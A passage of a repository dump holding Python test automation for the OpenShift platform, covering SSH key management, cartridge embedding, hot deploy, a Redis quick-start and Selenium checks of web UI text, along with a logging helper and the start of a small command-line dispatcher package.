common.app_types[self.app_type], self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, True],\n expect_return=0))\n\n self.steps_list.append(testcase.TestCaseStep(\"Upload settings.php\" ,\n '''\n cd %s &&\n mkdir -p .openshift/mms &&\n cat <<EOF >.openshift/mms/settings.php\nthis is settings.php\nEOF\n git add .openshift/mms/settings.php\n git commit -m \"settings.php\" &&\n git push\n '''%(self.app_name),\n expect_return=0,\n expect_string_list = [], \n expect_description=\"Uploading settings.php should pass.\"))\n\n self.steps_list.append(testcase.TestCaseStep(\"Embed with 10gen-mms-agent\",\n common.embed,\n function_parameters=[self.app_name, 'add-%s'%common.cartridge_types['10gen'], self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd],\n expect_string_list = [\"MongoDB must be embedded before the 10gen MMS Agent\"],\n expect_return=\"!0\"))\n\n case = testcase.TestCase(self.summary, self.steps_list)\n try:\n case.run()\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(MmsAgentWithoutMongodb)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of mms_agent_without_mongodb.py \n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { 
"alpha_fraction": 0.5984358787536621, "alphanum_fraction": 0.6109189391136169, "avg_line_length": 45.81690216064453, "blob_id": "881b434d252564c1ccb5a7201d86b890f5869386", "content_id": "1a8fc05556f4f81add39351479bb1d6db632aa65", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6649, "license_type": "no_license", "max_line_length": 246, "num_lines": 142, "path": "/automation/open/testmodules/UI/web/case_122221.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding=utf-8\n#\n# File name: case_122221.py\n# Date: 2012/06/29 10:56\n# Author: [email protected] \n#\n\nimport rhtest\nimport time\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n pass\n\n def finalize(self):\n pass\n\n\nclass CheckHomeContent(OpenShiftTest):\n def test_method(self):\n web = self.config.web\n web.go_to_home()\n #web.go_to_signin()\n #web.login()\n #Assert all the elements on home page (except for the footer).\n web.assert_text_equal_by_xpath('LEARN MORE',\n '''/html/body/header/nav[@id='nav']/div[1]/div/ul/li[1]/a/span''')\n web.assert_text_equal_by_xpath('GET STARTED',\n '''/html/body/header/nav[@id='nav']/div[1]/div/ul/li[2]/a/span''')\n web.assert_text_equal_by_xpath('DEVELOPERS',\n '''/html/body/header/nav[@id='nav']/div[1]/div/ul/li[4]/a/span''')\n web.assert_text_equal_by_xpath('COMMUNITY',\n '''/html/body/header/nav[@id='nav']/div[1]/div/ul/li[5]/a/span''')\n web.assert_text_equal_by_xpath('DEVELOP AND SCALE APPS IN THE CLOUD',\n '''//nav[@id='nav']/div[2]/div/h1''')\n web.assert_text_equal_by_xpath('''OpenShift is Red Hat's free, auto-scaling Platform as a Service (PaaS) for applications. As an application platform in the cloud, OpenShift manages the stack so you can focus on your code.''',\n '''//nav[@id='nav']/div[2]/div/h2''')\n web.assert_text_equal_by_xpath('GET STARTED IN THE CLOUD',\n '''//div[@id='learn']/div/div/a/div''')\n web.assert_text_equal_by_xpath('''SIGN UP - IT'S FREE''',\n '''//div[@id='learn']/div/div/a/div[2]''')\n web.assert_text_equal_by_xpath('Java, Ruby, Node.js, Python, PHP, or Perl',\n '''//div[@id='learn']/div/div/div/ul/li/a/h4''')\n web.assert_text_equal_by_xpath('Code in your favorite language, framework, and middleware. Grow your applications easily with resource scaling.','''//div[@id='learn']/div/div/div/ul/li/a/p''')\n web.assert_text_equal_by_xpath('Announcing the first tier of OpenShift pricing',\n '''//div[@id='learn']/div/div/div[2]/ul/li/a/h4''')\n web.assert_text_equal_by_xpath(\"We're announcing OpenShift pricing for the first paid tier offering, along with our plan to continue a free offering like the one that developers are currently enjoying in the OpenShift Developer Preview.\",\n '''//div[@id='learn']/div/div/div[2]/ul/li/a/p''')\n web.assert_text_equal_by_xpath('Super Fast!',\n '''//div[@id='learn']/div/div/div/ul/li[2]/a/h4''')\n web.assert_text_equal_by_xpath('Code and deploy to the cloud in minutes. Faster and easier than it has ever been.',\n '''//div[@id='learn']/div/div/div/ul/li[2]/a/p''')\n web.assert_text_equal_by_xpath('Build your apps with JBoss EAP 6',\n '''//div[@id='learn']/div/div/div[2]/ul/li[2]/a/h4''')\n web.assert_text_equal_by_xpath('Market-leading open source enterprise platform for next-generation, highly transactional enterprise Java applications. 
Build and deploy enterprise Java on OpenShift!',\n            '''//div[@id='learn']/div/div/div[2]/ul/li[2]/a/p''')\n        web.assert_text_equal_by_xpath('No Lock-In',\n            '''//div[@id='learn']/div/div/div/ul/li[3]/a/h4''')\n        web.assert_text_equal_by_xpath('Built on open technologies so you can take it with you.',\n            '''//div[@id='learn']/div/div/div/ul/li[3]/a/p''')\n        web.assert_text_equal_by_xpath('Find answers in the Developer Center',\n            '''//div[@id='learn']/div/div/div[2]/ul/li[3]/a/h4''')\n        web.assert_text_equal_by_xpath('Building applications involves lots of questions and we want you to find those answers fast. The new Developer Center will centralize and organize all our reference material.',\n            '''//div[@id='learn']/div/div/div[2]/ul/li[3]/a/p''')\n        \n\n        #check whether the links are correct\n        #LEARN MORE\n        web.click_element_by_xpath('''/html/body/header/nav[@id='nav']/div[1]/div/ul/li[1]/a/span''')\n        time.sleep(2)\n        web.check_title("About the OpenShift Platform as a Service (PaaS) | OpenShift by Red Hat")\n\n        #GET STARTED\n        web.go_to_home()\n        web.click_element_by_xpath('''/html/body/header/nav[@id='nav']/div[1]/div/ul/li[2]/a/span''')\n        web.check_title("Get Started with OpenShift | OpenShift by Red Hat")\n\n        #LOGO\n        web.go_to_home()\n        web.click_element_by_xpath('''/html/body/header/nav[@id='nav']/div[1]/div/div/a/div[1]''')\n        web.assert_text_equal_by_xpath('BUZZ',\n            '''/html/body/div[@id='buzz']/div/div/div/div/h2/strong''',\n            'Check the Buzz part is missing')\n\n        #DEVELOPERS\n        web.go_to_home()\n        web.click_element_by_xpath('''/html/body/header/nav[@id='nav']/div[1]/div/ul/li[4]/a/span''')\n        time.sleep(2)\n        web.check_title("Developer Center | OpenShift by Red Hat")\n\n        #COMMUNITY\n        web.go_to_home()\n        web.click_element_by_link_text("COMMUNITY")\n        web.check_title("Welcome to OpenShift | OpenShift by Red Hat")\n\n        #Other links\n        web.go_to_home()\n        web.click_element_by_xpath("//div[@id='learn']/div/div/div/ul/li/a/p")\n        web.check_title("About the OpenShift Platform as a Service (PaaS) | OpenShift by Red Hat")\n\n        web.go_to_home()\n        web.click_element_by_xpath("//div[@id='learn']/div/div/div[2]/ul/li/a/p")\n        web.check_title("Pricing | OpenShift by Red Hat")\n\n        web.go_to_home()\n        web.click_element_by_xpath("//div[@id='learn']/div/div/div/ul/li[2]/a/p")\n        web.check_title("About the OpenShift Platform as a Service (PaaS) | OpenShift by Red Hat")\n\n        web.go_to_home()\n        web.click_element_by_xpath("//div[@id='learn']/div/div/div/ul/li[3]/a/p")\n        web.check_title("About the OpenShift Platform as a Service (PaaS) | OpenShift by Red Hat")\n\n        web.go_to_home()\n        web.click_element_by_xpath("//div[@id='learn']/div/div/div[2]/ul/li[3]/a/p")\n        web.check_title("Developer Center | OpenShift by Red Hat")\n        self.tearDown()\n\n        return self.passed("Case 122221 test passed.")\n\n\n    def tearDown(self):\n        self.config.web.driver.quit()\n        self.assert_equal([], self.config.web.verificationErrors)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n    pass\n\ndef get_suite(conf):\n    suite = OpenShiftTestSuite(conf)\n    suite.add_test(CheckHomeContent)\n    return suite\n\ndef run(conf):\n    suite = get_suite(conf)\n    suite()\n\n#\n# end of case_122221.py \n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.6228753328323364, "alphanum_fraction": 0.6299574971199036, "avg_line_length": 41.787879943847656, "blob_id": "b604f4d14ad6974394091049a7bd7f53ff59d922", "content_id": "03cb3290059a7be82fa1d0aaa65abd445eb63a96", "detected_licenses": [], "is_generated": false, "is_vendor": false, 
"language": "Python", "length_bytes": 2824, "license_type": "no_license", "max_line_length": 116, "num_lines": 66, "path": "/automation/open/testmodules/RT/hot_deploy/jbossas_without_jenkins.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n\"\"\"\nAttila Nagy\nJul 26, 2012\n\n\n\"\"\"\nimport rhtest\nimport common\nfrom hot_deploy_test import HotDeployTest\n\nclass JBossHotDeployWithoutJenkins(HotDeployTest):\n def __init__(self, config):\n rhtest.Test.__init__(self, config)\n self.config.application_name = common.getRandomString()\n self.config.application_type = common.app_types['jbossas']\n self.config.application_type_no_version = \"jbossas\"\n self.config.scalable = False\n self.config.jenkins_is_needed = False\n self.config.summary = \"JBoss AS Hot Deployment Test without Jenkins\" \n #self.config.pid_file = '/app-root/runtime/jbossas.pid'\n #if self.config.application_type = \"jbossas-7\":\n # self.config.pid_file = '/app-root/runtime/jbossas.pid'\n #elif self.config.application_type in [\"jbossews-1.0\", \"jbossews-2.0\"]:\n # self.config.pid_file = '/jbossews/run/jboss.pid'\n #elif self.config.application_type = \"jbosseap-6.0\":\n # self.config.pid_file = '/app-root/runtime/jbosseap.pid'\n \n def configuration(self):\n self.log_info(\"Creating the application to check PID\")\n self.config.file_name = \"pid.jsp\"\n if self.config.application_type == \"jbossas-7\":\n self.config.pid_file = '/app-root/runtime/jbossas.pid'\n elif self.config.application_type in [\"jbossews-1.0\", \"jbossews-2.0\"]:\n self.config.pid_file = '/jbossews/run/jboss.pid'\n elif self.config.application_type == \"jbosseap-6.0\":\n self.config.pid_file = '/app-root/runtime/jbosseap.pid'\n self.info(\"Editing file '%s'...\" % self.config.file_name)\n jsp_file = open(\"./%s/src/main/webapp/%s\" % (self.config.application_name, self.config.file_name), \"w\")\n jsp_file.write('<%@ page contentType=\"text/plain\" %>\\n')\n jsp_file.write('<%@ page trimDirectiveWhitespaces=\"true\" %>\\n')\n jsp_file.write('<%@ page import=\"java.io.FileReader\" %>\\n')\n jsp_file.write('<%@ page import=\"java.io.BufferedReader\" %>\\n')\n jsp_file.write('<%\\n')\n jsp_file.write('String pid_file_name = System.getenv(\"OPENSHIFT_HOMEDIR\") + \"%s\";\\n' % self.config.pid_file)\n jsp_file.write('BufferedReader fileStream = new BufferedReader(new FileReader(pid_file_name));\\n')\n jsp_file.write('String line = null;\\n')\n jsp_file.write('while ( (line = fileStream.readLine()) !=null ) {\\n')\n jsp_file.write('out.print(line);\\n')\n jsp_file.write('}\\n')\n jsp_file.write('%>\\n')\n jsp_file.close()\n self.deploy()\n \nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(JBossHotDeployWithoutJenkins)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.6631016135215759, "alphanum_fraction": 0.6631016135215759, "avg_line_length": 61.5, "blob_id": "6027b2328fc190d9a5f46b476248791870ac8552", "content_id": "35888c96f2b24a65e6dec83d6ac06b8bfe3dcac6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 374, "license_type": "no_license", "max_line_length": 79, "num_lines": 6, "path": "/automation/clicksubmenu.js", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "String cssLocatorOfTheElement=....//locator of the element to click on \nJavascriptExecutor js = (JavascriptExecutor) driver;\n 
StringBuilder stringBuilder = new StringBuilder();\n    stringBuilder.append(\"var x = $(\\'\"+cssLocatorOfTheElement+\"\\');\");\n    stringBuilder.append(\"x.click();\");\n    js.executeScript(stringBuilder.toString());" }, { "alpha_fraction": 0.6188924908638, "alphanum_fraction": 0.6319218277931213, "avg_line_length": 21.439023971557617, "blob_id": "96d897c5fc258042136a76910c0529f7a4503ada", "content_id": "6039fe5ca69c38fcda5e4465137884b164f76933", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 921, "license_type": "no_license", "max_line_length": 76, "num_lines": 41, "path": "/automation/open/lib/clog.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "'''\n    File name: clog.py\n    Date: 2012/09/11 15:09\n    Author: [email protected]\n'''\n\nimport os\nimport sys\nimport logging, logging.handlers\n\nlog=None\n\ndef _config_logger(level=logging.INFO):\n    # create formatter\n    formatter = logging.Formatter(\"%(levelname)s [%(asctime)s] %(message)s\",\n            \"%H:%M:%S\")\n    logger = logging.getLogger(\"dump_logs\")\n    log_formatter = logging.Formatter(\n        \"%(name)s: %(asctime)s - %(levelname)s: %(message)s\")\n    \n    stream_handler = logging.StreamHandler(sys.stdout)\n    stream_handler.setFormatter(formatter)\n    stream_handler.setLevel(level)\n    logger.setLevel(level)\n    logger.addHandler(stream_handler)\n    return logger\n\n\n\ndef get_logger():\n    global log\n    if log is None:\n        level = logging.INFO\n        if os.getenv('RHTEST_DEBUG'):\n            level=logging.DEBUG\n        log = _config_logger(level)\n    return log\n\nlog = get_logger()\n\n# end of clog.py \n" }, { "alpha_fraction": 0.6028181314468384, "alphanum_fraction": 0.623954176902771, "avg_line_length": 25.705883026123047, "blob_id": "a3235e0918980b3edd86e3ba36b5722787706812", "content_id": "8fc80419a4097041f78ed88e69181bed104996cd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2271, "license_type": "no_license", "max_line_length": 114, "num_lines": 85, "path": "/automation/open/testmodules/UI/web/case_174336.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding=utf-8\n#\n# File name: case_174336.py\n# Date: 2012/07/17 11:23\n# Author: [email protected] \n#\n\nimport rhtest\nimport time\n\nclass OpenShiftTest(rhtest.Test):\n    def initialize(self):\n        pass\n\n    def finalize(self):\n        pass\n\n\nclass CreateJbossEapAppAndChangeDomainName(OpenShiftTest):\n    def test_method(self):\n        web = self.config.web\n\n        web.login()\n\n        #create a jbosseap app\n        web.create_app("jbosseap-6.0","jbosseap")\n\n        #check whether the links are correct\n        time.sleep(5)\n        \n        #check the "appurl" link\n        web.go_to_app_detail("jbosseap")\n        web.click_element_by_link_text('''http://jbosseap-'''+web.domain+'''.'''+web.platform+'''.rhcloud.com/''')\n        time.sleep(2)\n        web.assert_text_equal_by_xpath("Welcome To OpenShift, JBossEAP6.0 Cartridge",'''//h1''') \n        \n        #go to my account page and change domain name\n        web.go_to_domain_edit()\n        web.input_by_id("domain_name","yujzhangcccc")\n        web.click_element_by_id("domain_submit")\n        time.sleep(10)\n        \n        #check the url after changing the domain name\n        web.go_to_app_detail("jbosseap")\n        web.click_element_by_link_text('''http://jbosseap-yujzhangcccc.'''+web.platform+'''.rhcloud.com/''')\n        time.sleep(2)\n        web.assert_text_equal_by_xpath("Welcome To OpenShift, JBossEAP6.0 Cartridge",'''//h1''') \n\n        #change the domain name back\n        web.go_to_domain_edit()\n        
web.input_by_id(\"domain_name\",web.domain)\n web.click_element_by_id(\"domain_submit\")\n time.sleep(10)\n \n #delete a jbosseap app\n web.delete_last_app(\"jbosseap\")\n\n\n self.tearDown()\n\n return self.passed(\" case_174336--CreateJbossEapAppAndChangeDomainName passed successfully.\")\n\n\n def tearDown(self):\n self.config.web.driver.quit()\n self.assert_equal([], self.config.web.verificationErrors)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(CreateJbossEapAppAndChangeDomainName)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of case_174336.py\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5306689739227295, "alphanum_fraction": 0.5355845093727112, "avg_line_length": 36.43199920654297, "blob_id": "4c30363f5ab4ce8e56d2f29b43be0b01d1704bb9", "content_id": "a2b4d34662de7f233d4b3abf1a0ae7c8e08633e9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4679, "license_type": "no_license", "max_line_length": 148, "num_lines": 125, "path": "/automation/open/testmodules/RT/quick_start/quick_start_redis.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n\"\"\"\nAttila Nagy\[email protected]\nApr 30, 2012\n\n\"\"\"\nimport os, sys\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\ntestdir = os.path.normpath(WORK_DIR + \"/../../../\")\nsys.path.append(testdir)\n\nimport common\nimport rhtest\nfrom quick_start_test import QuickStartTest\nimport fileinput\nimport re\n\n\nclass QuickStartRedis(QuickStartTest):\n\n def __init__(self, config):\n rhtest.Test.__init__(self, config)\n self.config.application_type = common.app_types[\"ruby\"]\n self.config.application_embedded_cartridges = [ ]\n self.config.summary = \"[Runtime][rhc-cartridge]quick-start example: Redis\"\n self.config.git_upstream_url = \"git://github.com/openshift/redis-openshift-example.git\"\n self.config.random_value = common.getRandomString()\n self.config.page = \"redis-read\" # means '/'\n self.config.page_pattern = self.config.random_value\n\n def post_configuration_steps(self):\n \n try:\n for line in fileinput.input(\"./%s/config.ru\" % ( self.config.application_name ), inplace = True):\n if re.search(r'map.+health.+do', line):\n print \"require 'redis'\\n\"\n print \"map '/redis-write' do\"\n print \" redis_write = proc do |env|\"\n print \" redis = Redis.new(:path => '/tmp/redis.sock')\"\n #print \" redis = Redis.new(:path => ENV['OPENSHIFT_HOMEDIR'] + '%s' + '/tmp/redis.sock')\" %(self.config.application_type)\n print \" redis.set 'myword', '%s'\" % self.config.random_value\n print \" [ 200, { 'Content-Type' => 'text/plain' }, ['DB_OPERATION_SUCCESS']]\"\n print \" end\"\n print \" run redis_write\"\n print \"end\"\n print \n print \"map '/redis-read' do\"\n print \" redis_read = proc do |env|\"\n print \" redis = Redis.new(:path => '/tmp/redis.sock')\"\n #print \" redis = Redis.new(:path => ENV['OPENSHIFT_HOMEDIR'] + '%s' + '/tmp/redis.sock')\" %(self.config.application_type)\n print \" myword = redis.get 'myword'\"\n print \" [ 200, { 'Content-Type' => 'text/plain' }, [ myword ]]\"\n print \" end\"\n print \" run redis_read\"\n print \"end\"\n print\n print line,\n except Exception as e:\n fileinput.close()\n print type(e)\n print e.args\n self.fail(\"Configuration of the test-application must be successful\")\n finally:\n fileinput.close()\n\n #\n # Creating 
Gemfile\n        #\n        Gemfile = open(self.config.application_name + "/Gemfile", "w")\n        Gemfile.write('source \"http://rubygems.org/\"\\n')\n        Gemfile.write('gem \"rack\"\\n')\n        Gemfile.write('gem \"thread-dump\"\\n')\n        Gemfile.write('gem \"redis\"\\n')\n        Gemfile.close()\n\n        Gemfile_lock = open(self.config.application_name + "/Gemfile.lock", "w")\n        Gemfile_lock.write("GEM\\n")\n        Gemfile_lock.write("  remote: http://rubygems.org/\\n")\n        Gemfile_lock.write("  specs:\\n")\n        Gemfile_lock.write("    rack (1.4.1)\\n")\n        Gemfile_lock.write("    redis (3.0.1)\\n")\n        Gemfile_lock.write("    thread-dump (0.0.5)\\n")\n        Gemfile_lock.write("\\n")\n        Gemfile_lock.write("PLATFORMS\\n")\n        Gemfile_lock.write("  ruby\\n")\n        Gemfile_lock.write("\\n")\n        Gemfile_lock.write("DEPENDENCIES\\n")\n        Gemfile_lock.write("  rack\\n")\n        Gemfile_lock.write("  redis\\n")\n        Gemfile_lock.write("  thread-dump\\n")\n        Gemfile_lock.close()\n\n\n        configuration_steps = [\n            "cd %s" % self.config.application_name,\n            #"bundle",\n            "git add .",\n            "git commit -a -m testing",\n        ]\n\n        ret_code = common.command_get_status(" && ".join(configuration_steps))\n        self.assert_equal(ret_code, 0, "Configuration must be successful")\n\n    def post_deployment_steps(self):\n        ret_code = common.check_web_page_output(\n            self.config.application_name,\n            "redis-write",\n            "DB_OPERATION_SUCCESS" \n        )\n        self.assert_equal(ret_code, 0, "Writing to Redis DB must be successful")\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n    pass\n\ndef get_suite(conf):\n    suite = OpenShiftTestSuite(conf)\n    suite.add_test(QuickStartRedis)\n    return suite\n\ndef run(conf):\n    suite = get_suite(conf)\n    suite()\n" }, { "alpha_fraction": 0.6717791557312012, "alphanum_fraction": 0.6978527903556824, "avg_line_length": 18.147058486938477, "blob_id": "0ff766505b093a1e83223b1c4ed7a79a8ed1b884", "content_id": "9fb95410cb2d5786478eb8cddded4c9d106b9ed6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 652, "license_type": "no_license", "max_line_length": 81, "num_lines": 34, "path": "/automation/open/testmodules/RT/cartridge/jbossews_scaling_java7.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n\"\"\"\nAttila Nagy\[email protected]\n\nNov 28, 2012\n\"\"\"\n\nimport rhtest\nimport common\nimport os\nfrom shutil import rmtree\nfrom time import sleep\nfrom jbossews_java7 import EWSJava7Test\n\nclass EWSScalingJava7Test(EWSJava7Test):\n\n    def __init__(self, config):\n        EWSJava7Test.__init__(self, config)\n        self.config.scalable = True\n        self.config.summary = \"[US2513] Java 7 with scaling JbossEWS application\"\n    \nclass OpenShiftTestSuite(rhtest.TestSuite):\n    pass\n\ndef get_suite(conf):\n    suite = OpenShiftTestSuite(conf)\n    suite.add_test(EWSScalingJava7Test)\n    return suite\n\ndef run(conf):\n    suite = get_suite(conf)\n    suite()\n\n" }, { "alpha_fraction": 0.541124165058136, "alphanum_fraction": 0.5471578240394592, "avg_line_length": 33.988887786865234, "blob_id": "49433fe1c634468830a13736e00bad31cb44d61c", "content_id": "267aafe97a05d00a1c95ad61683c54e72f97a769", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3149, "license_type": "no_license", "max_line_length": 137, "num_lines": 90, "path": "/automation/open/testmodules/RT/client/rhc_wrapper_ssh.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nimport testcase, common, OSConf\nimport 
rhtest\nimport database\nimport time\nimport random\n# user defined packages\nimport openshift\n\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.user_email = self.config.OPENSHIFT_user_email\n self.user_passwd = self.config.OPENSHIFT_user_passwd\n self.key_filename = \"/tmp/libra_id_rsa1-%s\"%(os.getpid())\n tcms_testcase_id = 131033\n common.env_setup()\n self.key_name = common.getRandomString(10)\n self.steps_list = []\n\n def finalize(self):\n common.update_sshkey()\n os.system(\"rm -rf %s\"%self.key_filename)\n\n\nclass RhcWrapperSsh(OpenShiftTest):\n def test_method(self):\n step = testcase.TestCaseStep(\"Create additional key\" ,\n \"ssh-keygen -f %s -N '' \"%self.key_filename,\n expect_return=0)\n self.steps_list.append(step)\n\n \n step = testcase.TestCaseStep(\"rhc help sshkey\" ,\n \"rhc help sshkey\",\n expect_return=0,\n expect_string_list=[\"list\", \"add\", \"remove\"])\n self.steps_list.append(step)\n\n step = testcase.TestCaseStep(\"rhc sshkey add...\",\n common.add_sshkey,\n function_parameters=[\"%s.pub\" % self.key_filename, self.key_name, self.user_email, self.user_passwd],\n expect_return=0)\n self.steps_list.append(step)\n\n step = testcase.TestCaseStep(\"rhc sshkey list...\",\n \"rhc sshkey list -l %s -p %s %s\"%(self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_return=0,)\n self.steps_list.append(step)\n\n\n step = testcase.TestCaseStep(\"rhc sshkey remove...\",\n common.remove_sshkey,\n function_parameters=[self.key_name, self.user_email, self.user_passwd],\n expect_return=0)\n self.steps_list.append(step)\n '''\n step = testcase.TestCaseStep(\"Copy new keys to correct place\" ,\n \"cp %s.pub $HOME/.ssh/id_rsa.pub && cp %s $HOME/.ssh/id_rsa\" %(self.key_filename, self.key_filename),\n expect_return=0)\n self.steps_list.append(step)\n '''\n\n\n case = testcase.TestCase(\"[US1317][UI][CLI]rhc wrapper - rhc sshkey\", steps=self.steps_list)\n case.run()\n \n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(RhcWrapperSsh)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.7150837779045105, "alphanum_fraction": 0.7290502786636353, "avg_line_length": 24.571428298950195, "blob_id": "2035f9f30be6049b464778af7ab734764027a13c", "content_id": "4334d1eb26c176e25bc2e9634583ca4e763cfede", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 716, "license_type": "no_license", "max_line_length": 118, "num_lines": 28, "path": "/automation/open/testmodules/RT/hot_deploy/nodejs_scaling_without_jenkins.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n\"\"\"\nAttila Nagy\nNov 13, 2012\n\"\"\"\n\nimport rhtest\nimport common\nfrom nodejs_without_jenkins import NodeJSHotDeployWithoutJenkins\n\nclass NodeJSScalingHotDeployWithoutJenkins(NodeJSHotDeployWithoutJenkins):\n def __init__(self, config):\n NodeJSHotDeployWithoutJenkins.__init__(self, config)\n self.config.scalable = True\n self.config.summary = \"[US2747][RT]Hot deployment support for scalable application - without Jenkins - nodejs\"\n \nclass OpenShiftTestSuite(rhtest.TestSuite):\n 
pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(NodeJSScalingHotDeployWithoutJenkins)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.6127892136573792, "alphanum_fraction": 0.6160025596618652, "avg_line_length": 27.290908813476562, "blob_id": "1e5e3faab5c0d68e7cf4b974833255e55c8c85c8", "content_id": "06afdba36a4ecb2845fbe956a809393041b14c69", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3112, "license_type": "no_license", "max_line_length": 78, "num_lines": 110, "path": "/python-simple-cmd/scmd/__init__.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "import inspect\nimport optparse\nimport pkg_resources\nimport sys\n\nfrom scmd.utils.misc import walk_modules\nfrom scmd.command import BaseCommand\nfrom scmd.exceptions import UsageError\n\n\ndef _iter_command_classes(module_name):\n for module in walk_modules(module_name):\n for obj in vars(module).itervalues():\n if inspect.isclass(obj) and \\\n issubclass(obj, BaseCommand) and \\\n obj.__module__ == module.__name__:\n yield obj\n\n\ndef _get_commands_from_module(module):\n d = {}\n for cmd in _iter_command_classes(module):\n cmdname = cmd.__module__.split('.')[-1]\n d[cmdname] = cmd()\n return d\n\ndef _get_commands_from_entry_points(group='scmd.commands'):\n cmds = {}\n for entry_point in pkg_resources.iter_entry_points(group):\n obj = entry_point.load()\n if inspect.isclass(obj):\n cmds[entry_point.name] = obj()\n else:\n raise Exception(\"Invalid entry point %s\" % entry_point.name)\n return cmds\n\ndef _get_commands_dict(settings):\n cmds = _get_commands_from_module('scmd.commands')\n return cmds\n\ndef _pop_command_name(argv):\n i = 0\n for arg in argv[1:]:\n if not arg.startswith('-'):\n del argv[i]\n return arg\n i += 1\n\ndef _print_header(settings):\n print \"SCMD - wrong operations\\n\"\n\ndef _print_commands(settings):\n _print_header(settings)\n print \"Usage:\"\n print \" scmd <command> [options] [args]\\n\"\n print \"Available commands:\"\n cmds = _get_commands_dict(settings)\n for cmdname, cmdclass in sorted(cmds.iteritems()):\n print \" %-13s %s\" % (cmdname, cmdclass.short_desc())\n print\n print 'Use \"scmd <command> -h\" to see more info about a command'\n\ndef _print_unknown_command(settings, cmdname):\n _print_header(settings)\n print \"Unknown command: %s\\n\" % cmdname\n print 'Use \"scmd\" to see available commands' \n\ndef _run_print_help(parser, func, *a, **kw):\n try:\n func(*a, **kw)\n except UsageError, e:\n if str(e):\n parser.error(str(e))\n if e.print_help:\n parser.print_help()\n sys.exit(2)\n\ndef execute(argv=None, settings=None):\n if argv is None:\n argv = sys.argv\n\n if settings is None:\n settings = 'nothing'\n\n cmds = _get_commands_dict(settings)\n cmdname = _pop_command_name(argv)\n parser = optparse.OptionParser(formatter=optparse.TitledHelpFormatter(), \\\n conflict_handler='resolve')\n if not cmdname:\n _print_commands(settings)\n sys.exit(0)\n elif cmdname not in cmds:\n _print_unknown_command(settings, cmdname)\n sys.exit(2)\n\n cmd = cmds[cmdname]\n parser.usage = \"scmd %s %s\" % (cmdname, cmd.syntax())\n parser.description = cmd.long_desc()\n cmd.add_options(parser)\n opts, args = parser.parse_args(args=argv[1:])\n _run_print_help(parser, cmd.process_options, args, opts)\n _run_print_help(parser, _run_command, cmd, args, opts)\n sys.exit(cmd.exitcode)\n\ndef _run_command(cmd, args, opts):\n cmd.run(args, opts)\n\n\nif 
